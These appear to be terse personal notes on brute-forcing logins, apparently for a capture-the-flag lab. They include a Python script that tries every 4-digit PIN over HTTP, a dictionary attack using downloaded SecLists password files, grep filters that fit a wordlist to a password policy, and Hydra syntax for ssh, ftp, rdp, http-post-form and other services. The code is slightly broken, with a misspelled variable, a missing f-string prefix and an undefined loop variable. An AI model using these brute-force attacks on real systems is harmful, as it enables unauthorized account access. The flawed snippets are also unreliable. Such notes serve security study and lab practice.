not dict attack . get request and param crackin
import requests
ip =""
port = 12
for pin in range(1,10000):
formatted_pin = f"{pin:04d}"
print("Attempted Pin: {fomatted_pin}")
response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")
if response.ok and 'flag' in response.json():
print(f"Correct pin found: {formatted_pin}")
print(f"Flag: {response.json()['flag']}")
break
you can directly download and use a dictionary
passwords= requests.get("<https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/500-worst-passwords.txt>").text.splitlines()
response = requests.post(f"http://{ip}:{port}/dictionary", data={'password': password})
according to password policy:
wget <https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/darkweb2017_top-10000.txt>
grep -E '^.{8,}$' darkweb2017-top10000.txt > darkweb2017-minlength.txt
grep -E '[A-Z]' darkweb2017-minlength.txt > darkweb2017-uppercase.txt
grep -E '[a-z]' darkweb2017-uppercase.txt > darkweb2017-lowercase.txt
grep -E '[0-9]' darkweb2017-lowercase.txt > darkweb2017-number.txt
install
sudo apt-get -y install hydra
basic syntax :
hydra login ops pass ops attack ops service ops
-f first login. -s port . -t parallel service://server_ip/hostname. and -m "POST:user=^USER^&pass=^PASS^”
services : ftp, ssh, http-get, http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect”
smtp, pop3, imap, mysql, mssql, vnc, rdp
-M target-ips.txt for multiple ips